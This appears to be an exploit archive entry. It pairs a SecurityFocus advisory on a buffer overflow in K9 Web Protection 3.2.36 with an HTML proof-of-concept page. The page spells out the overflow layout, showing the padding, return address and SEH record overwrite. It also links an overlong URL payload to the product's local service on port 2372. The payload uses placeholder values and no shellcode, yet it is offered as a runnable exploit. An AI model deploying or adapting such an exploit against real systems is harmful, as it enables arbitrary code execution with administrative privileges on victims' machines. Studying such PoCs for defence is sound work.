30 lines
1.2 KiB
HTML
Executable file
30 lines
1.2 KiB
HTML
Executable file
source: http://www.securityfocus.com/bid/24373/info
|
|
|
|
K9 Web Protection is prone to a buffer-overflow vulnerability because it fails to perform sufficient boundary checks on user-supplied data before copying it to a buffer.
|
|
|
|
An attacker could leverage this issue to execute arbitrary code with administrative privileges. A successful exploit could result in the complete compromise of the affected system.
|
|
|
|
K9 Web Protection 3.2.36 is reported vulnerable; other versions may be affected as well.
|
|
|
|
<html>
|
|
<head>
|
|
<title>CSIS.DK - BlueCoat K9 Web Protection Overflow</title>
|
|
<center>
|
|
</center>
|
|
</head>
|
|
<body>
|
|
<h4><center> Discovery and Exploit by Dennis Rand - CSIS.DK</h4></center>
|
|
<br><b>http://127.0.0.1:2372/home.html[Ax168][DCBA][A x 56][BBBB][AAAA] </b><br>
|
|
<br><li> Return Address = DCBA
|
|
<br><li> Pointer to the next SEH record = BBBB
|
|
<br><li> SE Handler = AAAA
|
|
<br>
|
|
<center>
|
|
<b><A
|
|
HREF="http://127.0.0.1:2372/home.htmlAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCC
|
|
CDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGHHHHHHHHHHHH
|
|
HHHHaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbccccccccDCBAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCC
|
|
CCCCCCCCCCCCCDDDDDDDDaaaabbbb">RUN PoC</A></b>
|
|
</center>
|
|
</body>
|
|
</html>
|